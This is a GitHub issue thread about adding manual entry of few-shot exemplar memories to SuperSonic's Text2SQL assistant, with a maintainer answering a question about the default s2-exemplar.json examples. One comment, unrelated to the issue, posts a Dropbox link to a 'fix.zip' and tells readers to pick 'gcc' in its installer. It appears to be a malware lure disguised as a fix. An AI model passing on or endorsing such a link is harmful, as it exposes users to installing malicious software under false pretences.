### ISSUE TITLE
[Enhancement] 【记忆管理】支持人工录入记忆

### ISSUE THREAD

**Issue by jerryjzhang** [tencentmusic/supersonic#1603]
### Search before asking

- [X] I had searched in the [issues](https://github.com/tencentmusic/supersonic/issues?q=is%3Aissue) and found no similar issues.

### 背景

当前Text2SQL的few-shot exemplar有两个来源：一个是来自系统全局的s2-exemplar.json静态文件，另一个是来自历史问答产生的动态记忆。但是，有用户希望能够纯手动录入，虽然较为繁琐，但是强控制在特定场景可能带来更好的效果。因此，系统应当在助理管理中提供录入的界面。

### Are you willing to submit PR?

- [X] Yes I am willing to submit a PR!

### Code of Conduct

- [X] I agree to follow this project's [Code of Conduct](https://www.apache.org/foundation/policies/conduct)

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by becoder** [comment]
@jerryjzhang 你好，期待这个Enhancement早日上线，在上线之前想问一下，我是用的docker方式部署的SuperSonic，目前在用自己的数据做测试，发现s2-exemplar.json里的few-shot会导致很大的干扰，我找了好久没发现docker里s2-exemplar.json内容在哪里，我想把内置的few-shot都删掉，请问如何处理，多谢。

**Comment by jerryjzhang** [comment]
> @jerryjzhang 你好，期待这个Enhancement早日上线，在上线之前想问一下，我是用的docker方式部署的SuperSonic，目前在用自己的数据做测试，发现s2-exemplar.json里的few-shot会导致很大的干扰，我找了好久没发现docker里s2-exemplar.json内容在哪里，我想把内置的few-shot都删掉，请问如何处理，多谢。

你好，有个简单的办法是在【助理管理】里多输入一些【示例问题】，系统会自动去跑问答刷新记忆，会覆盖掉系统默认的few-shot。系统few-shot最好还是不要删除，如果没有记忆，还是需要一些示例去做引导。
